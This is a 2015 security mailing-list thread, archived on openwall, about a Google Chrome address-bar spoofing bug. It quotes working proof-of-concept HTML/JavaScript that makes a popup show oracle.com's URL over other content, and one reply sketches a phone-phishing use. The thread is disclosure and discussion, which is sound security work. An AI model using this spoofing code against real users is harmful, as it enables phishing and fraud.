lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <681041526.1096475.1435845066860.JavaMail.yahoo@mail.yahoo.com> Date: Thu, 2 Jul 2015 13:51:06 +0000 (UTC) From: Big Whale <d0lph1n98@...oo.com> To: Valentinas Bakaitis <v.bakaitis@...il.com>, David Leo <david.leo@...sen.co.uk> Cc: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>, "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>, "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com> Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment) Found this POC: musalbas/address-spoofing-poc | | | | | | | | | | | musalbas/address-spoofing-pocaddress-spoofing-poc - Chrome address spoofing vulnerability proof-of-concept for HTTPS. (Original by David Leo.) | | | | View on github.com | Preview by Yahoo | | | | | On Thursday, July 2, 2015 9:21 AM, Valentinas Bakaitis <v.bakaitis@...il.com> wrote: Can you perform any actions on the page once the URL is replaced, or is it non responsive? (asking because PoC did not work on my Chrome 43.0.2357.130 (64-bit) on OSX). If it is non responsive then the impact is very limited. Worst thing I can think of is showing "your account is suspended, please contact technical support on 0800-555-555" and then using the trust user puts in the URL for phone phishing. If it is responsive, then it's indeed pretty bad. Cheers! V. On Tue, Jun 30, 2015 at 6:08 PM, David Leo <david.leo@...sen.co.uk> wrote: > Impact: > The "click to verify" thing is completely broken... > Anyone can be "BBB Accredited Business" etc. > You can make whitehouse.gov display "We love Islamic State" :-) > > Note: > No user interaction on the fake page. > > Code: > ***** index.html > <script> > function next() > { > w.location.replace('http://www.oracle.com/index.html?'+n);n++; > setTimeout("next();",15); > setTimeout("next();",25); > } > function f() > { > w=window.open("content.html","_blank","width=500 height=500"); > > i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); > } > </script> > <a href="#" onclick="f()">Go</a><br> > ***** content.html > <b>This web page is NOT oracle.com</b> > <script>location="http://www.oracle.com/index.html";</script> > ***** It's online > http://www.deusen.co.uk/items/gwhere.6128645971389012/ > (The page says "June/16/2015" - it works as we tested today) > > Request For Comment: > We reported this to Google. > They reproduced, and say > It's DoS which doesn't matter. > We think it's very strange, > since the browser does not crash(not DoS), > and the threat is obvious. > What's your opinion? > > Kind Regards, > > PS > We love clever tricks. > We love this: > http://dieyu.org/ > > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists